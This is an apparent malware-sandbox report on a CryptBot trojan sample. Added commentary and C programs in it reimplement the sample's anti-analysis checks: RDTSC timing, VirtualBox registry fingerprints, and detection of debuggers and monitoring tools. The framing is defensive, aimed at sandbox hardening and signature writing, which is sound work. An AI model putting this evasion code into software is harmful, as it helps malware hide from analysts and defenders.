Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90B6E second address: 6E90B9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov edx, 799B91C2h 0x00000010 mov ah, dl 0x00000012 popad 0x00000013 nop 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90B9C second address: 6E90BB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B89513h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90BB3 second address: 6E90BE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-08h] 0x0000000c jmp 00007F6FA127EBDEh 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push edi 0x00000016 pop esi 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90BE8 second address: 6E90BFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA0B89511h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90BFD second address: 6E90C01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90C01 second address: 6E90C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6FA0B89513h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90C1F second address: 6E90C31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov eax, edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90C31 second address: 6E90C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90C35 second address: 6E90C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90C7F second address: 6E90D7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F6FA0B8950Fh 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test edi, edi 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F6FA0B8950Bh 0x00000017 or ax, 765Eh 0x0000001c jmp 00007F6FA0B89519h 0x00000021 popfd 0x00000022 mov dx, ax 0x00000025 popad 0x00000026 js 00007F70111D7EF6h 0x0000002c jmp 00007F6FA0B8950Ah 0x00000031 mov eax, dword ptr [ebp-04h] 0x00000034 jmp 00007F6FA0B89510h 0x00000039 mov dword ptr [esi+08h], eax 0x0000003c pushad 0x0000003d mov dx, cx 0x00000040 push ecx 0x00000041 jmp 00007F6FA0B89519h 0x00000046 pop eax 0x00000047 popad 0x00000048 lea eax, dword ptr [ebx+70h] 0x0000004b jmp 00007F6FA0B89517h 0x00000050 push 00000001h 0x00000052 pushad 0x00000053 mov di, ax 0x00000056 pushfd 0x00000057 jmp 00007F6FA0B89510h 0x0000005c sub esi, 380DB978h 0x00000062 jmp 00007F6FA0B8950Bh 0x00000067 popfd 0x00000068 popad 0x00000069 nop 0x0000006a jmp 00007F6FA0B89516h 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007F6FA0B8950Eh 0x00000077 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | RDTSC instruction interceptor: First address: 6E90D7B second address: 6E90D9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6FA127EBE0h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | RDTSC instruction interceptor: First address: 6E90D9F second address: 6E90DAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B8950Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | RDTSC instruction interceptor: First address: 6E90DAE second address: 6E90DB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | RDTSC instruction interceptor: First address: 6E90DB3 second address: 6E90E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F6FA0B89515h 0x0000000a sub si, 6786h 0x0000000f jmp 00007F6FA0B89511h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 lea eax, dword ptr [ebp-18h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F6FA0B89518h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | RDTSC instruction interceptor: First address: 6E90E06 second address: 6E90E0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | RDTSC instruction interceptor: First address: 6E90E0C second address: 6E90E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | RDTSC instruction interceptor: First address: 6E90E12 second address: 6E90E2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6FA127EBDEh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | RDTSC instruction interceptor: First address: 6E90E2D second address: 6E90E33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | RDTSC instruction interceptor: First address: 6E90E33 second address: 6E90E39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | RDTSC instruction interceptor: First address: 6E90E39 second address: 6E90E6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B89518h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F6FA0B8950Ch 0x00000014 mov edi, eax 0x00000016 popad 0x00000017 rdtsc
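The ten interceptor lines above are one timing probe read back to back: every pair of rdtsc reads is separated only by jmp, push/pop, pushad/popad and nop padding, and the sandbox logs each read, which is why the chain is visible at all. Stripped of the padding, the check is a handful of lines. The following is an added example, not code from the sample or from Joe Sandbox; the threshold of 1000 and the 64-probe minimum are illustrative assumptions, and on non-x86 builds it falls back to a monotonic clock so that it still compiles.

```c
/* Added example, not the sample's code: the timing check behind the RDTSC
 * interceptor trace, with the junk between the two reads collapsed.
 * Threshold and sample count are assumptions chosen for illustration. */
#define _POSIX_C_SOURCE 199309L
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#if defined(_MSC_VER)
#  include <intrin.h>
static uint64_t read_tsc(void) { return __rdtsc(); }
#elif defined(__x86_64__) || defined(__i386__)
#  include <x86intrin.h>
static uint64_t read_tsc(void) { return __rdtsc(); }
#else
/* No time-stamp counter on this architecture: use a monotonic nanosecond
 * clock so the example still builds; units are then ns rather than cycles. */
#  include <time.h>
static uint64_t read_tsc(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}
#endif

/* Smallest of n deltas. Protectors probe repeatedly and keep the minimum so
 * that one context switch between the two reads does not trip the check. */
uint64_t min_of(const uint64_t *d, size_t n) {
    uint64_t m = d[0];
    for (size_t i = 1; i < n; i++) if (d[i] < m) m = d[i];
    return m;
}

/* The decision: two near-adjacent reads differ by a few dozen cycles on bare
 * metal. Single-stepping, an emulator, or a hypervisor that traps RDTSC
 * inflates that gap by orders of magnitude. */
int looks_instrumented(uint64_t min_delta, uint64_t threshold) {
    return min_delta > threshold;
}

/* One probe = one "rdtsc ... rdtsc" pair from the trace; the volatile no-op
 * stands in for the push/pop/jmp padding between the reads. */
static uint64_t probe_once(void) {
    uint64_t t0 = read_tsc();
    volatile int pad = 0; (void)pad;
    uint64_t t1 = read_tsc();
    return t1 - t0;
}

uint64_t measure_min_delta(size_t samples) {
    uint64_t d[256];
    if (samples > 256) samples = 256;
    if (samples == 0) samples = 1;
    for (size_t i = 0; i < samples; i++) d[i] = probe_once();
    return min_of(d, samples);
}

int main(void) {
    const uint64_t threshold = 1000;  /* assumption: cycles on bare metal */
    uint64_t m = measure_min_delta(64);
    printf("min delta between reads: %llu -> %s\n", (unsigned long long)m,
           looks_instrumented(m, threshold) ? "instrumented" : "native");
    return 0;
}
```

This is why a sandbox intercepts RDTSC at all: if every read returns a plausibly small increment, the minimum delta stays under the threshold and the protector proceeds to the real payload. The same probe fires under a debugger that breaks or single-steps between the two reads, which is why the report lists the 0_2_00429980 rdtsc function both here and under Anti Debugging. The Oreans.vxd and Software\WinLicense strings further down this section identify the protector family that wraps the sample.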
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Special instruction interceptor: First address: 921963 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Special instruction interceptor: First address: B5A49C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_00429980 rdtsc 0_2_00429980
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe TID: 8160 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_0024255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0024255D
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_002429FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_002429FF
Source: s8kPMNXOZY.exe, s8kPMNXOZY.exe, 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: s8kPMNXOZY.exe | Binary or memory string: Hyper-V RAW
Source: s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: s8kPMNXOZY.exe, 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: s8kPMNXOZY.exe, 00000000.00000003.1398563303.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1398595351.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, s8kPMNXOZY.exe, 00000000.00000002.1406402610.0000000000F74000.00000004.00000020.00020000.00000000.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1398993637.0000000000F73000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Note on the two "Hyper-V RAW" hits: the string sits next to %SystemRoot%\system32\mswsock.dll because it is the name of the Winsock Hyper-V socket provider that ships with stock Windows 10; it comes from the system's own Winsock catalog, not from a VM check in the sample. The VBOX__ DSDT key, the VBoxSF service and the C:\Windows\System32\VBox*.dll pattern are the real VirtualBox probes.
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Process information queried: ProcessInformation
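The three registry reads above (the display-adapter class key's DriverDesc, SystemBiosVersion and VideoBiosVersion) together with the VBOX__ DSDT key and the VBoxSF service name in memory are plain VirtualBox fingerprinting. Added example, not the sample's code: the lookups reduced to the comparisons that decide the result, run over a constructed registry snapshot. The key paths are the ones the sample queried; the giveaway substrings VBOX and VIRTUALBOX, and the data in both snapshots, are assumptions about what a stock VirtualBox guest and a bare-metal host report, not values taken from the report. On Windows the same probes are read live with RegOpenKeyExA/RegQueryValueExA (the part under #ifdef _WIN32).

```c
/* Added example, not the sample's code: registry-based VirtualBox checks
 * reduced to their decision logic. Key paths come from the report; needle
 * substrings and both snapshots are assumptions about typical systems. */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

struct reg_entry {
    const char *key;    /* path under HKEY_LOCAL_MACHINE */
    const char *value;  /* value name, or NULL when only the key's existence matters */
    const char *data;   /* string data, or NULL */
};
struct reg_probe { const char *key; const char *value; const char *needle; };

static const char DISPLAY_CLASS[] =
    "SYSTEM\\ControlSet001\\Control\\Class\\{4d36e968-e325-11ce-bfc1-08002be10318}\\0000";

/* One probe per lookup in the report; needle == NULL means key existence is the signal. */
static const struct reg_probe PROBES[] = {
    { "HARDWARE\\DESCRIPTION\\System", "SystemBiosVersion", "VBOX" },
    { "HARDWARE\\DESCRIPTION\\System", "VideoBiosVersion",  "VIRTUALBOX" },
    { DISPLAY_CLASS,                    "DriverDesc",        "VIRTUALBOX" },
    { "HARDWARE\\ACPI\\DSDT\\VBOX__",            NULL, NULL },
    { "SYSTEM\\ControlSet001\\Services\\VBoxSF", NULL, NULL },
};
#define NPROBES (sizeof PROBES / sizeof PROBES[0])

static int eq_ci(const char *a, const char *b) {
    for (; *a && *b; a++, b++)
        if (toupper((unsigned char)*a) != toupper((unsigned char)*b)) return 0;
    return *a == *b;
}

/* Case-insensitive substring search; registry strings are not case-normalised. */
static int contains_ci(const char *hay, const char *needle) {
    size_t n = strlen(needle);
    for (; *hay; hay++) {
        size_t i = 0;
        while (i < n && hay[i] &&
               toupper((unsigned char)hay[i]) == toupper((unsigned char)needle[i])) i++;
        if (i == n) return 1;
    }
    return 0;
}

int entry_is_vm_indicator(const struct reg_entry *e) {
    for (size_t i = 0; i < NPROBES; i++) {
        const struct reg_probe *p = &PROBES[i];
        if (!eq_ci(p->key, e->key)) continue;
        if (p->value == NULL) return 1;                 /* key exists: that is enough */
        if (e->value && e->data && eq_ci(p->value, e->value) && contains_ci(e->data, p->needle))
            return 1;
    }
    return 0;
}

int count_vm_indicators(const struct reg_entry *snap, size_t n) {
    int hits = 0;
    for (size_t i = 0; i < n; i++) hits += entry_is_vm_indicator(&snap[i]);
    return hits;
}

/* Constructed snapshots (assumed values, not data from the report). */
static const struct reg_entry VBOX_GUEST[] = {
    { "HARDWARE\\DESCRIPTION\\System", "SystemBiosVersion", "VBOX   - 1" },
    { "HARDWARE\\DESCRIPTION\\System", "VideoBiosVersion",  "Oracle VM VirtualBox VESA BIOS" },
    { DISPLAY_CLASS, "DriverDesc", "VirtualBox Graphics Adapter" },
    { "HARDWARE\\ACPI\\DSDT\\VBOX__", NULL, NULL },
    { "SYSTEM\\ControlSet001\\Services\\VBoxSF", NULL, NULL },
};
static const struct reg_entry BARE_METAL[] = {
    { "HARDWARE\\DESCRIPTION\\System", "SystemBiosVersion", "DELL   - 1072009" },
    { "HARDWARE\\DESCRIPTION\\System", "VideoBiosVersion",  "Intel Video BIOS" },
    { DISPLAY_CLASS, "DriverDesc", "Intel(R) UHD Graphics 620" },
};
#define NENT(a) (sizeof (a) / sizeof (a)[0])

int vbox_guest_hits(void) { return count_vm_indicators(VBOX_GUEST, NENT(VBOX_GUEST)); }
int bare_metal_hits(void) { return count_vm_indicators(BARE_METAL, NENT(BARE_METAL)); }

#ifdef _WIN32
#include <windows.h>
/* Live variant: RegOpenKeyExA alone answers existence probes; RegQueryValueExA
 * fetches the data (for REG_MULTI_SZ values only the first string is examined). */
int count_vm_indicators_live(void) {
    int hits = 0;
    for (size_t i = 0; i < NPROBES; i++) {
        HKEY h; char buf[512]; DWORD len = sizeof buf - 1, type = 0;
        if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, PROBES[i].key, 0, KEY_READ, &h) != ERROR_SUCCESS)
            continue;
        if (PROBES[i].value == NULL) { hits++; RegCloseKey(h); continue; }
        if (RegQueryValueExA(h, PROBES[i].value, NULL, &type, (LPBYTE)buf, &len) == ERROR_SUCCESS) {
            buf[len] = '\0';
            struct reg_entry e = { PROBES[i].key, PROBES[i].value, buf };
            hits += entry_is_vm_indicator(&e);
        }
        RegCloseKey(h);
    }
    return hits;
}
#endif

int main(void) {
    printf("VirtualBox guest snapshot: %d indicator(s)\n", vbox_guest_hits());
    printf("bare-metal snapshot:       %d indicator(s)\n", bare_metal_hits());
    return 0;
}
```

For sandbox hardening this is the list to scrub: the two BIOS strings and the display DriverDesc need plausible OEM values, and the VBOX__ ACPI key and the VBoxSF service must not exist at all. The sample addresses ControlSet001 by number rather than through CurrentControlSet, so the values have to be fixed in every ControlSet00N present, not only in the one the link points to.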

Anti Debugging

Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | File opened: NTICE
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | File opened: SICE
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Process queried: DebugPort (three separate queries)
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Code function: 0_2_00429980 rdtsc 0_2_00429980
Source: s8kPMNXOZY.exe, s8kPMNXOZY.exe, 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: :Program Manager
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation (three separate queries)
Source: C:\Users\user\Desktop\s8kPMNXOZY.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: procmon.exe
Source: s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: wireshark.exe
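The Anti Debugging entries above are three variants of one question, "is an analysis tool present?": window classes and titles looked up by name, SoftICE-era kernel-debugger device names opened as files, and process image names compared case-insensitively (the 0_2_002429FF function in the sandbox-evasion list chains CreateToolhelp32Snapshot, QueryFullProcessImageNameA and CharUpperA for exactly this). Added example, not the sample's code: the three lists as the report shows them, the matching logic that API sequence implies, and a run over a constructed process list; the live scan under #ifdef _WIN32 is one straightforward implementation of that API sequence, not recovered code.

```c
/* Added example, not the sample's code: the analysis-tool checks listed under
 * Anti Debugging reduced to their matching logic. Name lists are from the
 * report; the Win32 scan is a plausible implementation, not recovered code. */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#  include <windows.h>
#  include <tlhelp32.h>
#endif

/* Window classes and titles the sample opens. */
static const char *const WINDOW_NAMES[] = {
    "regmonclass", "gbdyllo", "procmon_window_class", "ollydbg", "filemonclass",
    "process monitor - sysinternals: www.sysinternals.com",
    "registry monitor - sysinternals: www.sysinternals.com",
    "file monitor - sysinternals: www.sysinternals.com",
};
/* Device names the sample opens; they exist only while a SoftICE-style kernel debugger is loaded. */
static const char *const DEVICE_NAMES[] = { "NTICE", "SICE", "SIWVID" };
/* Process image names found in the sample's memory dumps. */
static const char *const PROCESS_NAMES[] = {
    "WINDBG.EXE", "wireshark.exe", "procmon.exe", "x64dbg.exe", "ida.exe",
};
#define COUNT(a) (sizeof (a) / sizeof (a)[0])

/* Case-insensitive equality: the effect of the sample's CharUpperA before comparing. */
static int eq_ci(const char *a, const char *b) {
    for (; *a && *b; a++, b++)
        if (toupper((unsigned char)*a) != toupper((unsigned char)*b)) return 0;
    return *a == *b;
}

/* Last path component, since QueryFullProcessImageNameA returns a full path. */
static const char *basename_of(const char *path) {
    const char *p = strrchr(path, '\\');
    const char *q = strrchr(path, '/');
    if (q && (!p || q > p)) p = q;
    return p ? p + 1 : path;
}

int is_analysis_process(const char *image_path) {
    const char *base = basename_of(image_path);
    for (size_t i = 0; i < COUNT(PROCESS_NAMES); i++)
        if (eq_ci(base, PROCESS_NAMES[i])) return 1;
    return 0;
}

int is_analysis_window(const char *class_or_title) {
    for (size_t i = 0; i < COUNT(WINDOW_NAMES); i++)
        if (eq_ci(class_or_title, WINDOW_NAMES[i])) return 1;
    return 0;
}

/* "File opened: NTICE" in the report is a CreateFile on the \\.\NTICE device path. */
int device_path(const char *name, char *out, size_t out_len) {
    int n = snprintf(out, out_len, "\\\\.\\%s", name);
    return n > 0 && (size_t)n < out_len;
}

int count_analysis_processes(const char *const *images, size_t n) {
    int hits = 0;
    for (size_t i = 0; i < n; i++) hits += is_analysis_process(images[i]);
    return hits;
}

/* Constructed process list standing in for a Toolhelp snapshot (not real data). */
int demo_hits(void) {
    static const char *const images[] = {
        "C:\\Windows\\explorer.exe",
        "C:\\Program Files\\Wireshark\\Wireshark.exe",
        "C:\\Tools\\IDA\\ida.exe",
        "C:\\Windows\\System32\\svchost.exe",
    };
    return count_analysis_processes(images, COUNT(images));
}

#ifdef _WIN32
int scan_live(void) {
    int hits = 0;
    char dev[64];
    for (size_t i = 0; i < COUNT(WINDOW_NAMES); i++)
        if (FindWindowA(WINDOW_NAMES[i], NULL) || FindWindowA(NULL, WINDOW_NAMES[i])) hits++;
    for (size_t i = 0; i < COUNT(DEVICE_NAMES); i++) {
        if (!device_path(DEVICE_NAMES[i], dev, sizeof dev)) continue;
        HANDLE h = CreateFileA(dev, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL);
        if (h != INVALID_HANDLE_VALUE) { CloseHandle(h); hits++; }
    }
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snap != INVALID_HANDLE_VALUE) {
        PROCESSENTRY32 pe; pe.dwSize = sizeof pe;
        for (BOOL ok = Process32First(snap, &pe); ok; ok = Process32Next(snap, &pe))
            hits += is_analysis_process(pe.szExeFile);
        CloseHandle(snap);
    }
    return hits;
}
#endif

int main(void) {
    char dev[64];
    for (size_t i = 0; i < COUNT(DEVICE_NAMES); i++)
        if (device_path(DEVICE_NAMES[i], dev, sizeof dev)) printf("would open %s\n", dev);
    printf("constructed process list: %d analysis tool(s)\n", demo_hits());
    return 0;
}
```

Two practical points follow from the lists. The strings survive the protector verbatim (procmon.exe and wireshark.exe show up in the memory dumps above), so they are usable as YARA material. And because every check is an exact name match, renaming the tool's window class and image file, as several analysis setups already do, defeats this whole class of check without touching the sample; the HideFromDebugger thread flag and the DebugPort queries in the same section are the checks that rename tricks do not reach.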

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.10:49715 -> 81.29.149.125:80
MITRE ATT&CK matrix, flattened to one line per tactic. A number in brackets is the count the report attaches to that technique; techniques without a number are the matrix's unmatched placeholders.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (24); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (751); Virtualization/Sandbox Evasion (24); Process Discovery (13); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (216)
Lateral Movement: Exploitation of Remote Services (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (11); Data from Local System (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (2); Non-Application Layer Protocol (3); Application Layer Protocol (4); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label
s8kPMNXOZY.exe | 52% | Virustotal |
s8kPMNXOZY.exe | 63% | ReversingLabs | Win32.Trojan.CryptBot
s8kPMNXOZY.exe | 100% | Avira | TR/Crypt.TPM.Gen
